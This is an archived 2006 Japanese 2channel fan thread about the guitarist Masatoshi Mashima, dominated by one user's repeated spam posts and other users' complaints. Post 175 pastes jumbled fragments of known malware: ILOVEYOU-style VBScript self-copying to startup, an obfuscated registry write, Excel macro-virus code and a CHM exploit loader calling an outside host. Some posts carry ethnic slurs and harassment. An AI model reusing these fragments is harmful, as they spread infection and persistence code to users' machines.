5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

真島昌利 PART13〜何回目の夏か数えた〜

1 :1:2006/07/05(水) 00:19:28
前スレ
真島昌利part12 〜地球の一番はげた場所〜
http://music4.2ch.net/test/read.cgi/legend/1144877446/

関連スレ
真島昌利無類のカレー好き
http://food6.2ch.net/test/read.cgi/curry/1070425383/

過去スレ
真島昌利 〜カレーライスにゃかなわない〜
http://music.2ch.net/music/kako/1002/10024/1002457250.html
真島昌利Part2 〜冥王星から来た男〜
http://music.2ch.net/legend/kako/1027/10273/1027339762.html
真島昌利Part3 〜俺は死ぬまでロックする〜
http://music.2ch.net/legend/kako/1040/10406/1040660800.html
真島昌利Part4 〜月曜日はsageちゃったよ〜
http://music2.2ch.net/test/read.cgi/legend/1045065313/
真島昌利Part5 〜さあもうタリラリラ〜ン♪
http://music2.2ch.net/test/read.cgi/legend/1059640067/
真島昌利Part6〜 RAW LIFE RAW LIFE〜
http://music3.2ch.net/test/read.cgi/legend/1064996778/
真島昌利Part7〜JonnyThreeCoolCats〜
http://music4.2ch.net/test/read.cgi/legend/1081647654/
真島昌利part8
http://music4.2ch.net/test/read.cgi/legend/1091341194/
真島昌利part9〜終わりなき午後の冒険者〜
http://music4.2ch.net/test/read.cgi/legend/1104105768/
真島昌利part10 〜人にはそれぞれ事情がある〜
http://music4.2ch.net/test/read.cgi/legend/1112279746/
真島昌利part11 〜人にはそれぞれ事情がある〜
http://music4.2ch.net/test/read.cgi/legend/1136173464/

2 :伝説の名無しさん:2006/07/05(水) 06:00:35
おらおら、WWF(World Wide Fund for Nature:世界自然保護基金)の
愛くるしいパンダ様が>>2ゲットだぜ! 頭が高いんだよ、ボケ!

.         ,:::-、       __     >1 クソスレ建ててんじゃねーよ。ビンスみてーに裁判で潰しちまうぞ。
    ,,r   〈:::::::::)    ィ::::::ヽ    >3 >>2ゲットも満足にできねーお前は、俺の着ぐるみ着てプラカード持ってろ(プ
  〃   ,::::;r‐'´       ヽ::ノ     >4 お前はカキフライのAAでも貼ってりゃいいんだよ、リア厨ヒッキー(プ
  ,'::;'   /::/  __            >5 汗臭いキモヲタデブは2ちゃんと一緒に人生終了させろ、バーカ。
.  l:::l   l::::l /:::::)   ,:::::、  ji     >6 いまさら>>2ゲット狙ってんじゃねーよ、タコ。すっトロいんだよ。
  |::::ヽ j::::l、ゝ‐′  ゙:;;:ノ ,j:l     >7 ラッキーセブンついでに教えてやるが、俺はストーンコールドが好きだぜ。
  }:::::::ヽ!::::::::ゝ、 <:::.ァ __ノ::;!     >8 知性のねーカキコだが、お前の人生の中で精一杯の自己表現かもな(プ
.  {::::::::::::::::::::::::::::`='=‐'´:::::::::/      >9 つーか、自作自演でこのスレ盛り上げて何が楽しいんだ?
  ';::::::::::::ト、::::::::::::::i^i::::::::::::/      >10-999 WWEなんか見てるヒマがあったら、俺に募金しろカスども。
.   `ー--' ヽ:::::::::::l l;;;;::::ノ       >1000 1000ゲットしたって、WWF時代の映像物に販売許可は出さねーよ。
        `ー-"

3 :伝説の名無しさん:2006/07/05(水) 11:21:57

くそスレいらね




4 :伝説の名無しさん:2006/07/05(水) 14:58:28
>>1


5 :伝説の名無しさん:2006/07/05(水) 15:04:03
楽器・作曲板
【THE BLUE HEARTSTHE HIGH LOWS】真島昌利の音
http://music4.2ch.net/test/read.cgi/compose/1146822759/l50
カレー板
真島昌利 悲しい気分にカレーと味噌汁
http://food6.2ch.net/test/read.cgi/curry/1142029704/l50
パンク板
甲本さんと真島さんのけむちとおちちと愛を語るスレ
http://music4.2ch.net/test/read.cgi/punk/1146459420/l50


6 :マーシー大好きっ子:2006/07/05(水) 17:00:49
マーシーアルバム出さないのかなぁ\(^O^)/

7 :マーシー大好きっ子:2006/07/05(水) 17:01:45
マーシーアルバム出さないのかなぁ\(^O^)/

8 :マーシー大好きっ子:2006/07/05(水) 17:03:13
マーシーアルバム出さないのかなぁ\(^O^)/

9 :マーシー大好きっ子:2006/07/05(水) 17:04:16
マーシーアルバム出さないのかなぁ\(^O^)/

10 :マーシー大好きっ子:2006/07/05(水) 17:05:08
マーシーアルバム出さないのかなぁ\(^O^)/

11 :マーシー大好きっ子:2006/07/05(水) 17:06:28
マーシーアルバム出さないのかなぁ\(^O^)/

12 :マーシー大好きっ子:2006/07/05(水) 17:07:14
マーシーアルバム出さないのかなぁ\(^O^)/

13 :マーシー大好きっ子:2006/07/05(水) 17:08:52
マーシーアルバム出さないのかなぁ\(^O^)/

14 :マーシー大好きっ子:2006/07/05(水) 17:10:40
マーシーアルバム出さないのかなぁ\(^O^)/

15 :マーシー大好きっ子:2006/07/05(水) 17:13:46
マーシーアルバム出さないのかなぁ\(^O^)/

16 :マーシー大好きっ子:2006/07/05(水) 17:18:48
マーシーアルバム出さないのかなぁ\(^O^)/

17 :伝説の名無しさん:2006/07/05(水) 17:23:53
前スレのインタビューもっとうpきぼん

18 :伝説の名無しさん:2006/07/05(水) 17:33:29
18ゲトズサーーーーー!!!!!!!!!!

19 :マーシー大好きっ子:2006/07/05(水) 19:16:51
マーシーアルバム出さないのかなぁ\(^O^)/

20 :伝説の名無しさん:2006/07/05(水) 19:48:57
>マーシー大好きっ子
わかったからとりあえず落ち着こうな、頼むから

21 :伝説の名無しさん:2006/07/05(水) 20:12:02
にっぽんの夏、真島の夏じゃないのか・・(´・∀・`)

22 :マーシー大好きっ子:2006/07/05(水) 20:38:47
マーシーアルバム出さないのかなぁ\(^O^)/

23 :マーシー大好きっ子:2006/07/05(水) 20:44:29
マーシーアルバム出さないのかなぁ\(^O^)/

24 :マーシー大好きっ子:2006/07/05(水) 20:48:14
マーシーアルバム出さないのかなぁ\(^O^)/

25 :マーシー大好きっ子:2006/07/05(水) 20:49:46
マーシーアルバム出さないのかなぁ\(^O^)/

26 :伝説の名無しさん:2006/07/05(水) 20:49:59
アルバムもいいな!

27 :マーシー大好きっ子:2006/07/05(水) 21:16:57
マーシーアルバム出さないのかなぁ\(^O^)/

28 :伝説の名無しさん:2006/07/05(水) 21:23:29
>>1
乙カレー

29 :マーシー大好きっ子:2006/07/05(水) 21:23:33
マーシーアルバム出さないのかなぁ\(^O^)/

30 :伝説の名無しさん:2006/07/05(水) 21:39:58
>>1乙カレーうどん

アルバム出してほしいよねぇ

31 :マーシー大好きっ子:2006/07/05(水) 21:46:43
マーシーアルバム出さないのかなぁ\(^O^)/

32 :マーシー大好きっ子:2006/07/05(水) 22:38:33
マーシーアルバム出さないのかなぁ\(^O^)/

33 :真島:2006/07/05(水) 22:42:22
ソロアルバムは食べちゃったよ
甲本ヒロトがさぁ
食べちゃったんだよね

34 :伝説の名無しさん:2006/07/05(水) 22:45:49
わっ
再び謎のインタビューキタコレ

35 :真島:2006/07/05(水) 22:47:37
ペイルスネークはヒロトがモデル

ってのはもちろん嘘ですw

36 :伝説の名無しさん:2006/07/05(水) 22:51:15
音人のインタビュー、ちょこんと座るマーシーかわい〜。ソロアルバム出しそうにない感じだね。また楽しいバンドやりそうですね。

37 :マーシー大好きっ子:2006/07/05(水) 22:57:21
マーシーアルバム出さないのかなぁ\(^O^)/

38 :伝説の名無しさん:2006/07/05(水) 23:14:14
>36
同感
やっぱバンドが好きなんだね


そしてスレタイこっちにしたの?

39 :マーシー大好きっ子:2006/07/06(木) 00:11:38
マーシーアルバム出さないのかなぁ\(^O^)/

40 :伝説の名無しさん:2006/07/06(木) 02:23:01
顔を洗うのに三日かかるマーシー

41 :伝説の名無しさん:2006/07/06(木) 02:26:29
真島新バンド
ジャムパンズ

42 :伝説の名無しさん:2006/07/06(木) 02:33:01
真島に管理されたい
時々クリームパンなどをくれればいいから

43 :伝説の名無しさん:2006/07/06(木) 02:37:44
ヘレン・ケラー論を真島と語った
妊娠のイメージはまだつかめなかった

44 :伝説の名無しさん:2006/07/06(木) 02:41:03
真島100000000円くれ

45 :マーシー大好きっ子:2006/07/06(木) 02:45:24
マーシーアルバム出さないのかなぁ\(^O^)/

46 :伝説の名無しさん:2006/07/06(木) 02:46:45
真島と理髪店に行く
剃刀を持ったままニコニコしている店長がいた

47 :伝説の名無しさん:2006/07/06(木) 02:48:02
マーシーにおしっこを我慢させられている子供
にこにこしていた

48 :マーシー大好きっ子:2006/07/06(木) 04:00:11
マーシーアルバム出さないのかなぁ\(^O^)/

49 :伝説の名無しさん:2006/07/06(木) 04:03:49
何かと比べては「マーシーの方が上手」言わないと気がすまない真島昌利とそのオタ達

50 :伝説の名無しさん:2006/07/06(木) 13:16:16
日本語でね〜

51 :伝説の名無しさん:2006/07/06(木) 16:21:05
ジャムパンズ……

52 :マーシー大好きっ子:2006/07/06(木) 16:55:28
マーシーアルバム出さないのかなぁ\(^O^)/

53 :マーシー大好きっ子:2006/07/06(木) 17:37:07
マーシーアルバム出さないのかなぁ\(^O^)/

54 :マーシー大好きっ子:2006/07/06(木) 17:38:09
マーシーアルバム出さないのかなぁ\(^O^)/

55 :マーシー大好きっ子:2006/07/06(木) 19:50:29
マーシーアルバム出さないのかなぁ\(^O^)/

56 :伝説の名無しさん:2006/07/06(木) 20:45:56
そろそろ通報してもいいよね…?

57 :伝説の名無しさん:2006/07/06(木) 21:09:38
とっくにNGにしてるから、なんだかよくわかんないけどw

58 :マーシー大好きっ子:2006/07/06(木) 21:47:44
マーシーアルバム出さないのかなぁ\(^O^)/

59 :マーシー大好きっ子:2006/07/06(木) 22:02:13
マーシーアルバム出さないのかなぁ\(^O^)/

60 :伝説の名無しさん:2006/07/06(木) 22:45:15
最初は早くスレ埋めて
にっぽんの夏 真島の夏
にしたいのかな?って思って「なんだ、ちょっとかわいい奴」って思ってたけど…正直kitty guyかと。







(^ω^)大好きっ子ウザイお

61 :伝説の名無しさん:2006/07/06(木) 22:48:49
うん、うざい。
充分荒らしだね。

62 :マーシー大好きっ子:2006/07/06(木) 22:53:57
マーシーアルバム出さないのかなぁ\(^O^)/

63 :伝説の名無しさん:2006/07/06(木) 22:58:42
長引きそうだけど、カレーにする〜で行こう。

64 :マーシー大好きっ子:2006/07/06(木) 23:13:09
マーシーアルバム出さないのかなぁ\(^O^)/

65 :伝説の名無しさん:2006/07/07(金) 00:17:23
荒らしてる大好きっ子ってニセモノじゃないの?
前は毎回マメに絵文字変えてたけどここんとこずっと同じだし
アンチのなりすまし工作じゃね?

66 :マーシー大好きっ子:2006/07/07(金) 00:30:58
マーシーアルバム出さないのかなぁ\(^O^)/

67 :伝説の名無しさん:2006/07/07(金) 00:34:18
65 ↑こいつ、アンチマーシーのスレにもマーシー大好きっ子が同じ絵文字でいっぱいいれてるよ…

68 :伝説の名無しさん:2006/07/07(金) 00:54:49
>67
65じゃないけど、アンチ見てきた。マーシー大好きっ子祭りだったね。早く前みたいに戻らないかな。
もどっておくれよ(´・ω・)



あえて聞いてみよう。マーシー大好きっ子はどのなアルバムが好きかい?
自分はHAPPY SONGSかな。

69 :伝説の名無しさん:2006/07/07(金) 00:57:59
NGにしとけばそんなに不快でもないよ

70 :伝説の名無しさん:2006/07/07(金) 01:02:43
>>68
アンチまで荒らされてる…
なんだこのカオスwwww

夏のぬけがらが好きです。
ビール飲みながら聞きたい

71 :マーシー大好きっ子:2006/07/07(金) 02:05:52
マーシーアルバム出さないのかなぁ\(^O^)/

72 :マーシー大好きっ子:2006/07/07(金) 02:14:42
マーシーアルバム出さないのかなぁ\(^O^)/

73 :マーシー大好きっ子:2006/07/07(金) 02:21:09
マーシーアルバム出さないのかなぁ\(^O^)/

74 :マーシー大好きっ子:2006/07/07(金) 02:33:13
マーシーアルバム出さないのかなぁ\(^O^)/

75 :マーシー大好きっ子:2006/07/07(金) 02:44:14
マーシーアルバム出さないのかなぁ\(^O^)/

76 :伝説の名無しさん:2006/07/07(金) 03:06:04
マーシー大好きっ子は1人じゃないよww

77 :伝説の名無しさん:2006/07/07(金) 03:23:06
真島オタにとって気分の悪い書き込みは全て「自演」ですから。
どこの板でも粘着で誰のオタより最悪最強ですね。


78 :マーシー大好きっ子:2006/07/07(金) 03:59:33
マーシーアルバム出さないのかなぁ\(^O^)/

79 :マーシー大好きっ子:2006/07/07(金) 04:17:58
マーシーアルバム出さないのかなぁ\(^O^)/


80 :マーシー大好きっ子:2006/07/07(金) 04:29:55
マーシーアルバム出さないのかなぁ\(^O^)/

81 :マーシー大好きっ子:2006/07/07(金) 07:55:24
マーシーアルバム出さないのかなぁ\(^O^)/

82 :マーシー大好きっ子:2006/07/07(金) 09:53:14
マーシーアルバム出さないのかなぁ\(^O^)/

83 :伝説の名無しさん:2006/07/07(金) 14:37:27
死ぬまで追いかけるお

84 :伝説の名無しさん:2006/07/07(金) 23:43:48
住所電話番号

85 :マーシー大好きっ子:2006/07/07(金) 23:49:18
マーシーアルバム出さないのかなぁ\(^O^)/

86 :マーシー大好きっ子:2006/07/07(金) 23:52:25
マーシーアルバム出さないのかなぁ\(^O^)/

87 :マーシー大好きっ子:2006/07/08(土) 00:21:41
マーシーアルバム出さないのかなぁ\(^O^)/

88 :マーシー大好きっ子:2006/07/08(土) 00:48:31
マーシーアルバム出さないのかなぁ\(^O^)/

89 :マーシー大好きっ子:2006/07/08(土) 01:32:29
マーシーアルバム出さないのかなぁ\(^O^)/

90 :伝説の名無しさん:2006/07/08(土) 01:34:02
パワーが弱まってきたなw

91 :マーシー大好きっ子:2006/07/08(土) 02:38:19
マーシーアルバム出さないのかなぁ\(^O^)/

92 :マーシー大好きっ子:2006/07/08(土) 03:11:05
マーシーアルバム出さないのかなぁ\(^O^)/

93 :マーシー大好きっ子:2006/07/08(土) 04:23:22
マーシーアルバム出さないのかなぁ\(^O^)/

94 :伝説の名無しさん:2006/07/08(土) 04:29:11
真島オタ同士で処分してくれ。
ヒロトのスレに憑いて離れねーよコイツ↓


81 :NO MUSIC NO NAME:2006/07/07(金) 16:02:45 ID:vixl6l6q
ヒロトの音楽飽きた。

マーシーも自分の曲をソロでやってほしいよ



95 :伝説の名無しさん:2006/07/08(土) 04:35:20
田代マーシーが覗き変態マーシーなら、こちらのマーシーはスカトロマーシーですな。


96 :伝説の名無しさん:2006/07/08(土) 14:18:07
>>94
午前四時の妄想乙
つかここ荒らしてるやつこそ真島のヲタだろうが

97 :マーシー大好きっ子:2006/07/08(土) 16:58:00
マーシーアルバム出さないのかなぁ\(^O^)/

98 :マーシー大好きっ子:2006/07/08(土) 17:37:09
マーシーアルバム出さないのかなぁ\(^O^)/

99 :マーシー大好きっ子:2006/07/08(土) 17:51:20
マーシーアルバム出さないのかなぁ\(^O^)/

100 :マーシー大好きっ子:2006/07/08(土) 19:05:36
マーシーアルバム出さないのかなぁ\(^O^)/

101 :マーシー大好きっ子:2006/07/08(土) 20:42:39
マーシーアルバム出さないのかなぁ\(^O^)/

102 :伝説の名無しさん:2006/07/08(土) 21:07:31
もっとマーシーを語ろうよ。。
話題ないけど

103 :伝説の名無しさん:2006/07/08(土) 21:43:28
マーシーの笑顔って素敵やん。

104 :伝説の名無しさん:2006/07/08(土) 22:03:24
マーシーって泣けるやん。

105 :伝説の名無しさん:2006/07/08(土) 22:43:37
>102

んと。音楽と人買いました。
あとトリビュートも買ったよ。かっこよかった。



話題が無いね(´・ω・)

106 :マーシー大好きっ子:2006/07/08(土) 22:46:07
マーシーアルバム出さないのかなぁ\(^O^)/

107 :マーシー大好きっ子:2006/07/09(日) 00:57:41
マーシーアルバム出さないのかなぁ\(^O^)/

108 :伝説の名無しさん:2006/07/09(日) 03:04:27
大好きっこがんばれ
みんなおまえを応援してるぞ

109 :マーシー大好きっ子:2006/07/09(日) 03:07:25
マーシーアルバム出さないのかなぁ\(^O^)/

110 :マーシー大好きっ子:2006/07/09(日) 03:13:19
マーシーアルバム出さないのかなぁ\(^O^)/

111 :マーシー大好きっ子:2006/07/09(日) 03:46:45
マーシーアルバム出さないのかなぁ\(^O^)/

112 :伝説の名無しさん:2006/07/09(日) 03:48:54
>大好きっ子
何で最近顔文字手抜きなの!?!?

113 :マーシー大好きっ子:2006/07/09(日) 04:26:45
マーシーアルバム出さないのかなぁ\(^O^)/

114 :マーシー大好きっ子:2006/07/09(日) 05:13:47
マーシーアルバム出さないのかなぁ\(^O^)/

115 :マーシー大好きっ子:2006/07/09(日) 06:04:58
マーシーアルバム出さないのかなぁ\(^O^)/

116 :マーシー大好きっ子:2006/07/09(日) 06:07:43
マーシーアルバム出さないのかなぁ\(^O^)/

117 :マーシー大好きっ子:2006/07/09(日) 06:34:28
マーシーアルバム出さないのかなぁ\(^O^)/

118 :マーシー大好きっ子:2006/07/09(日) 06:50:36
マーシーアルバム出さないのかなぁ\(^O^)/

119 :伝説の名無しさん:2006/07/09(日) 06:50:37
>>96
「妄想乙」
真島オタの合言葉

120 :伝説の名無しさん:2006/07/09(日) 06:58:11
>>119
午前に6時妄想乙!真島オタです!

121 :伝説の名無しさん:2006/07/09(日) 11:55:55
妄想しようそうしよう♪

122 :伝説の名無しさん:2006/07/09(日) 13:23:47
大好きっ子がんば

123 :伝説の名無しさん:2006/07/09(日) 13:40:30
悪い事は全て妄想の世界へ消えてけ!

124 :マーシー大好きっ子:2006/07/09(日) 15:50:41
マーシーアルバム出さないのかなぁ\(^O^)/

125 :マーシー大好きっ子:2006/07/09(日) 15:52:31
マーシーアルバム出さないのかなぁ\(^O^)/

126 :マーシー大好きっ子:2006/07/09(日) 16:32:23
マーシーアルバム出さないのかなぁ\(^O^)/

127 :伝説の名無しさん:2006/07/09(日) 19:13:57
大好きっ子↓聞いてオナヌーでも
ttp://cp9a.or.tp/up30m/src/up(-.-)y-33007.zip.html
ソロアルバムぢゃニャイけど

128 :伝説の名無しさん:2006/07/09(日) 19:56:06
福岡在住乙

129 :マーシー大好きっ子:2006/07/09(日) 20:44:44
マーシーアルバム出さないのかなぁ\(^O^)/

130 :伝説の名無しさん:2006/07/09(日) 22:22:22
http://cp9a.or.tp/up30m/src/up(-.-)y-33007.zip.html

131 :マーシー大好きっ子:2006/07/09(日) 22:47:53
マーシーアルバム出さないのかなぁ\(^O^)/

132 :マーシー大好きっ子:2006/07/09(日) 22:52:26
マーシーアルバム出さないのかなぁ\(^O^)/

133 :マーシー大好きっ子:2006/07/09(日) 23:28:12
マーシーアルバム出さないのかなぁ\(^O^)/

134 :マーシー大好きっ子:2006/07/10(月) 00:05:46
マーシーアルバム出さないのかなぁ\(^O^)/

135 :マーシー大好きっ子:2006/07/10(月) 01:25:45
マーシーアルバム出さないのかなぁ\(^O^)/

136 :マーシー大好きっ子:2006/07/10(月) 02:30:06
マーシーアルバム出さないのかなぁ\(^O^)/

137 :マーシー大好きっ子:2006/07/10(月) 02:38:49
マーシーアルバム出さないのかなぁ\(^O^)/

138 :マーシー大好きっ子:2006/07/10(月) 03:16:54
マーシーアルバム出さないのかなぁ\(^O^)/

139 :伝説の名無しさん:2006/07/10(月) 03:32:48
ocn乙

140 :マーシー大好きっ子:2006/07/10(月) 04:05:04
マーシーアルバム出さないのかなぁ\(^O^)/

141 :伝説の名無しさん:2006/07/10(月) 04:18:33
ttp://www.youtube.com/watch?v=VKKhH4hDwiI

142 :マーシー大好きっ子:2006/07/10(月) 04:28:08
マーシーアルバム出さないのかなぁ\(^O^)/

143 :マーシー大好きっ子:2006/07/10(月) 04:42:24
マーシーアルバム出さないのかなぁ\(^O^)/

144 :マーシー大好きっ子:2006/07/10(月) 05:08:42
マーシーアルバム出さないのかなぁ\(^O^)/

145 :マーシー大好きっ子:2006/07/10(月) 05:14:02
マーシーアルバム出さないのかなぁ\(^O^)/

146 :マーシー大好きっ子:2006/07/10(月) 05:27:41
マーシーアルバム出さないのかなぁ\(^O^)/

147 :マーシー大好きっ子:2006/07/10(月) 06:01:37
マーシーアルバム出さないのかなぁ\(^O^)/

148 :マーシー大好きっ子:2006/07/10(月) 06:26:31
マーシーアルバム出さないのかなぁ\(^O^)/

149 :マーシー大好きっ子:2006/07/10(月) 07:18:18
マーシーアルバム出さないのかなぁ\(^O^)/

150 :マーシー大好きっ子:2006/07/10(月) 07:33:13
マーシーアルバム出さないのかなぁ\(^O^)/

151 :マーシー大好きっ子:2006/07/10(月) 07:40:07
マーシーアルバム出さないのかなぁ\(^O^)/

152 :マーシー大好きっ子:2006/07/10(月) 07:48:22
マーシーアルバム出さないのかなぁ\(^O^)/

153 :マーシー大好きっ子:2006/07/10(月) 09:01:00
マーシーアルバム出さないのかなぁ\(^O^)/

154 :マーシー大好きっ子:2006/07/10(月) 09:46:50
マーシーアルバム出さないのかなぁ\(^O^)/

155 :マーシー大好きっ子:2006/07/10(月) 10:49:32
マーシーアルバム出さないのかなぁ\(^O^)/

156 :マーシー大好きっ子:2006/07/10(月) 20:57:52
マーシーアルバム出さないのかなぁ\(^O^)/

157 :伝説の名無しさん:2006/07/10(月) 21:01:49
>>127
餌やんなや

158 :マーシー大好きっ子:2006/07/10(月) 23:18:31
マーシーアルバム出さないのかなぁ\(^O^)/

159 :マーシー大好きっ子:2006/07/10(月) 23:50:37
マーシーアルバム出さないのかなぁ\(^O^)/

160 :マーシー大好きっ子:2006/07/11(火) 01:19:53
マーシーアルバム出さないのかなぁ\(^O^)/

161 :伝説の名無しさん:2006/07/11(火) 09:18:30
拝啓マーシー
22日は渋谷に居ますか?

162 :伝説の名無しさん:2006/07/11(火) 12:34:42
いるよーー!!

163 :伝説の名無しさん:2006/07/11(火) 19:30:26
やったー
じゃ、会いに行きますねー!!

164 :伝説の名無しさん:2006/07/12(水) 00:59:42
にこにこ

165 :伝説の名無しさん:2006/07/12(水) 06:37:39
にしこり

166 :伝説の名無しさん:2006/07/12(水) 13:18:49
やっと「LAW LIFE」手に入れた!!
「こんなもんじゃない」泣けた・・・。

167 :伝説の名無しさん:2006/07/12(水) 14:00:40
>>166
ネット通販?

168 :マーシー大好きっ子:2006/07/12(水) 14:20:34
マーシーのアルバム全部持ってるよ(o^o^o)

169 :伝説の名無しさん:2006/07/12(水) 14:38:03
RAW LIFEだろ
能無し

170 :伝説の名無しさん:2006/07/12(水) 21:56:02
>>168
全部ちょうだい

171 :伝説の名無しさん:2006/07/12(水) 22:40:43
OCN乙とか、それ位でビビらないだろ ww
OCNだって!私の事だヤバいよ〜(;>_<;)
身元特定されちゃうよ〜(×_×)
とか言ったらオモロイけど

172 :伝説の名無しさん:2006/07/12(水) 22:42:52
OCN乙とか、それ位でビビらないだろ ww
OCNだって!私の事だ!ヤバいよ〜!(;>_<;)
身元特定されちゃうよ〜!(×_×)
とか言ったらオモロイけど

173 :伝説の名無しさん:2006/07/12(水) 23:10:43
ocn乙

174 :伝説の名無しさん:2006/07/12(水) 23:49:00
OCNだって!私の事だ!ヤバいよ〜!(;>_<;)
身元特定されちゃうよ〜!(×_×)
もうしません
もうしません
もうしません
もうしません
もうしませんからOCNを調べないで下さい(>_<)

175 :伝説の名無しさん:2006/07/13(木) 00:09:24
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

176 :伝説の名無しさん:2006/07/14(金) 04:25:45
真島教より長渕教が最高さ!

177 :マーシー大好きっ子:2006/07/14(金) 10:22:05
マーシーの方が最高だよ(^◯^)

178 :伝説の名無しさん:2006/07/14(金) 10:26:25
ocn

↑なんかこれ、座禅組んでるみたい。

179 :伝説の名無しさん:2006/07/14(金) 13:00:35
ねえ大好きっ子はヒロトは好き?マーシーだけ?

180 :マーシー大好きっ子:2006/07/14(金) 14:51:59
ヒロトもそれなりに好き。でもCDは買わないよ(o^o^o)

181 :伝説の名無しさん:2006/07/14(金) 16:13:16
ふぅん。そうなんだ。
マーシーのアルバム出るといいね。

182 :マーシー大好きっ子:2006/07/14(金) 16:50:07
マーシーアルバム出さないのかなぁ\(^O^)/

183 :伝説の名無しさん:2006/07/14(金) 18:20:29
>>182
いまさら契約してくれるレコード会社がないみたいよ

184 :伝説の名無しさん:2006/07/14(金) 20:17:35
>>183
自分のレーベルがあるだろ!!!
って、あれってなんだ?ハイロウズのやつなのか?ハッピーソングって

185 :伝説の名無しさん:2006/07/14(金) 20:35:55
マーシーはネーミングにもセンスあるよね

186 :伝説の名無しさん:2006/07/15(土) 03:09:09
ネーミングセンス無いと思うけどな。
創価信者が池田大作の駄作をババアどもが「素晴らしいわ」「センスあるわ」
と喜んでいるのと同じだ。

187 :伝説の名無しさん:2006/07/15(土) 06:49:46
アホか。

188 :伝説の名無しさん:2006/07/15(土) 07:20:01
マーシー!
今日も大好きだぁー!!

189 :マーシー大好きっ子:2006/07/15(土) 07:58:38
マーシーアルバム出さないのかなぁ\(^O^)/

190 :マーシー大好きっ子:2006/07/15(土) 08:03:57
マーシーアルバム出さないのかなぁ\(^O^)/

191 :伝説の名無しさん:2006/07/15(土) 08:11:20
冷たい夜にぶちこまれぇ〜 法律と俺は闘ったぁ法律が俺に勝ったぁ。あの子もどっかえ消え去ったぁ。法律と俺は闘ったぁ。法律が俺に勝ったぁ。付きにも見離されてぇ〜もはやこれまでかぁ〜あの子は、とってもいい子だったぁ。法律と俺は闘ったぁ。法律が俺に勝ったぁ。(^O^)

192 :伝説の名無しさん:2006/07/16(日) 09:48:29
マーシーほんま何しとんねん

193 :マーシー大好きっ子:2006/07/16(日) 16:41:27
マーシーアルバム出さないのかなぁ\(^O^)/

194 :伝説の名無しさん:2006/07/16(日) 21:28:16
マーシーのレコーディング風景が見たい

195 :バボ:2006/07/17(月) 00:33:12
何このスレ?

196 :伝説の名無しさん:2006/07/17(月) 03:10:14
なんか>>192みて関西のキモイ追っかけ女思い出したわ。
もうストーカー行為はやめてね、ずっと待ってたりとかや☆

197 :マーシー大好きっ子:2006/07/17(月) 19:57:03
マーシーアルバム出さないのかなぁ\(^O^)/

198 :伝説の名無しさん:2006/07/17(月) 23:31:19
久しぶりにマーシースレ来た!
マーシー大好きっ子ウゼェ、こんなスレだったか!?
と一瞬思ったが…

マーシーアルバム出さないのかなぁ\(^O^)/

199 :伝説の名無しさん:2006/07/18(火) 00:01:29
マーシーマーシーマーシーマーシー

200 :マーシー大好きっ子:2006/07/18(火) 10:48:44
マーシーアルバム出さないのかなぁ\(^O^)/

201 :マーシー大好きっ子:2006/07/18(火) 12:44:59
マーシーアルバム出さないのかなぁ\(^O^)/

202 :伝説の名無しさん:2006/07/18(火) 13:03:14
マーシー大好きっ子さんへレスは考えてしょう!気持ちわかるけど。またすぐスレッドたてるようになっちゃうよ

203 :マーシー大好きっ子:2006/07/18(火) 14:15:14
マーシーアルバム出さないのかなぁ\(^O^)/

204 :伝説の名無しさん:2006/07/18(火) 14:26:28
マーシーの目って茶色だよね。
裸眼なの?

205 :伝説の名無しさん:2006/07/18(火) 18:58:42
目確かに茶色いよね〜色白だし、色素が薄いのか。鼻も高いし、純日本人に見えない。白人の血入ってそう。あと普段の声はかわい〜のに歌うときはしゃがれてるのは何故?

206 :伝説の名無しさん:2006/07/18(火) 19:16:36
>>205
きっと在日なんだよ。妄想オナニーしてろ。

207 :伝説の名無しさん:2006/07/18(火) 19:46:06
>>202
マーシー大好きっ子本人専用スレ作ってあげれば?
書き込みは「マーシーアルバム出さないのかなぁ\(^O^)/ 」しかないだろうけど。
しかし、ウザくてしつこい女だよな。無駄使いしやがって。


208 :伝説の名無しさん:2006/07/18(火) 20:14:42
あっちこっちで大活躍だねw

209 :伝説の名無しさん:2006/07/18(火) 20:24:41
>>205
アジア人は黒目が主流。したがって茶色目のマーシーが在日な訳がない。
ロシア系に茶色目が多いらしいよ


210 :伝説の名無しさん:2006/07/18(火) 20:32:06
やっとマーシー大好きっ子に対しての批判レスがきたね!いままでみなさん野放ししすぎ。だから調子ずいてんだよ。

211 :伝説の名無しさん:2006/07/18(火) 20:33:02
批判レスは荒らしの餌。

212 :伝説の名無しさん:2006/07/18(火) 20:38:37
マーシー大好きっ子の書き込みアンチスレならいいが
ここではただのウザッ!

213 :伝説の名無しさん:2006/07/18(火) 20:49:38
マーシー大好きっ子って女なん??

214 :マーシー大好きっ子:2006/07/18(火) 21:11:44
マーシーアルバム出さないのかなぁ\(^O^)/

215 :マーシー大好きっ子:2006/07/18(火) 21:15:39
マーシーアルバム出さないのかなぁ\(^O^)/

